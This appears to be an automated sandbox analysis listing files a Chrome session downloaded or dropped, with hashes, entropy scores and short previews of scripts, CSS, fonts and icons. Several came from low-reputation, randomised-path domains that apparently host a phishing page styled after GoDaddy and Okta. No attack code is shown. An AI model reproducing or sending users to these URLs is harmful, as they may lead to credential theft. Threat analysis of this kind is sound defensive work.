                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var S=function(){return[function(q,y,d,h,l,A,G,V){if((q-((q>>((G=[26,"A","JT"],q|72)==q&&(d=[sC,VO],V=(h=Array.from(ee(vv)).find(function(v){return d.includes(v.autocomplete)&&v.type!=Wv&&v.value}))==y?void 0:h.value),1)&11)>=3&&(q-7&16)<9&&(A=h.u[h.u.length-y],l=OC(),A.Pj<=l&&(A.CB=d),h[G[1]]&&h[G[1 =A.CB||(A.CB===1?(h[G[1]]=y,h.Yu(A.Pj-l)):(h[G[1]]=d,h[G[2]]()))),5)|35)<q&&q-8<<1>=q)S[13](3,"label",this);return(q|7)>=-43&&(q|3)>>4<1&&(V=H[28](G[0],y,d,h)),V},function(q,y,d,h,l,A,G,V,v,e,a){return(((q|.1)&(a=[8,7,"O"],a[1]))>=0&&q>>1<12&&(h.P[a[2]]=y,v=[!0,100,1E3],U[36](2,v[1],"2fa","audio",36,h.u,d),h.u.P.I=h
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):35786
                                                        Entropy (8bit):5.058073854893359
                                                        Encrypted:false
                                                        SSDEEP:192:hToogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkf1WcrScuH9Ye3YdersR8Q5oqWjfuogF:h0DKAaZtJsOodwuhx5P6mqjDggJkLRn
                                                        MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                        SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                        SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                        SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/abPT4sUgOrsEgh28
                                                        Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):1190
                                                        Entropy (8bit):5.309063448496411
                                                        Encrypted:false
                                                        SSDEEP:24:hP6tRRQ7hLuKJJ4X9jxTbPXwEf3s9FS07EPa2Zdy9mCk:t6tPQ7hLuKJJxEPGL7EPV7yzk
                                                        MD5:A23CF289DE81B0BF9C39D9E396C43B21
                                                        SHA1:469874B2F6D771179DCE86A0C8FAB5A13D7A8ECF
                                                        SHA-256:397755D946611605BC16EDD5E2417575AAD30D5C0855C2D97452DDA8860D223E
                                                        SHA-512:20CC6A753D8C385B4C5ACC6AC3BA2690E6A850D7DFA65BE733254157A2A4822288FF656A51E48F605486BAFA3CC87C1E7E8B18D5B80BF850DE785F555F58E6DA
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:http://mithunaads.in/favicon.ico
                                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>..<meta charset="utf-8">..<title>404 Page Not Found</title>..<style type="text/css">....::selection { background-color: #E13300; color: white; }..::-moz-selection { background-color: #E13300; color: white; }....body {...background-color: #fff;...margin: 40px;...font: 13px/20px normal Helvetica, Arial, sans-serif;...color: #4F5155;..}....a {...color: #003399;...background-color: transparent;...font-weight: normal;..}....h1 {...color: #444;...background-color: transparent;...border-bottom: 1px solid #D0D0D0;...font-size: 19px;...font-weight: normal;...margin: 0 0 14px 0;...padding: 14px 15px 10px 15px;..}....code {...font-family: Consolas, Monaco, Courier New, Courier, monospace;...font-size: 12px;...background-color: #f9f9f9;...border: 1px solid #D0D0D0;...color: #002166;...display: block;...margin: 14px 0 14px 0;...padding: 12px 10px 12px 10px;..}....#container {...margin: 10px;...border: 1px solid #D0D0D0;...box-shadow: 0 0 8px #D0D0D0;..}....p
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):10796
                                                        Entropy (8bit):7.946024875001343
                                                        Encrypted:false
                                                        SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                        MD5:12BDACC832185D0367ECC23FD24C86CE
                                                        SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                        SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                        SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                        Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):48316
                                                        Entropy (8bit):5.6346993394709
                                                        Encrypted:false
                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):268
                                                        Entropy (8bit):5.111190711619041
                                                        Encrypted:false
                                                        SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                        MD5:59759B80E24A89C8CD029B14700E646D
                                                        SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                        SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                        SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:V:V
                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:0
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):2905
                                                        Entropy (8bit):3.962263100945339
                                                        Encrypted:false
                                                        SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                        MD5:FE87496CC7A44412F7893A72099C120A
                                                        SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                        SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                        SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:very short file (no magic)
                                                        Category:downloaded
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:V:V
                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hyu.prosolmi.su/303099441074343CfLSMHKSVVDKIFYXJFBCMGNWLKLWUCXXAXBRXOUIETMQLASTZV
                                                        Preview:0
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                        Category:downloaded
                                                        Size (bytes):28000
                                                        Entropy (8bit):7.99335735457429
                                                        Encrypted:true
                                                        SSDEEP:768:NDT1rKvlJOE1AgLlnGj8H58AJUcl5I17ML7FfNHubNIphqb:NDtKvyAhjHeACcl21YL7KNW+
                                                        MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                        SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                        SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                        SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/pq4G6HI3Ijg6dT2j1yzOjuv38
                                                        Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):48316
                                                        Entropy (8bit):5.6346993394709
                                                        Encrypted:false
                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):93276
                                                        Entropy (8bit):7.997636438159837
                                                        Encrypted:true
                                                        SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                        MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                        SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                        SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                        SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/cdwMHwMulA2IdrzZU0QtBhWShA342kvmGDEeGbEkl100
                                                        Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):36696
                                                        Entropy (8bit):7.988666025644622
                                                        Encrypted:false
                                                        SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                        MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                        SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                        SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                        SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/45itnDnlBkLf89wB5guMvj2hxy65
                                                        Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):7390
                                                        Entropy (8bit):4.02755241095864
                                                        Encrypted:false
                                                        SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                        MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                        SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                        SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                        SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):29796
                                                        Entropy (8bit):7.980058333789969
                                                        Encrypted:false
                                                        SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                        MD5:210433A8774859368F3A7B86D125A2A7
                                                        SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                        SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                        SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):268
                                                        Entropy (8bit):5.111190711619041
                                                        Encrypted:false
                                                        SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                        MD5:59759B80E24A89C8CD029B14700E646D
                                                        SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                        SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                        SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/rsc29PUGZXGytlZ4a12Ib7SKJKCK2VqFWGPhMrghtk1NENcQADfU8gfkOTDnYef200
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (45667)
                                                        Category:downloaded
                                                        Size (bytes):45806
                                                        Entropy (8bit):5.207605835316031
                                                        Encrypted:false
                                                        SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                        MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                        SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                        SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                        SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdn.socket.io/4.6.0/socket.io.min.js
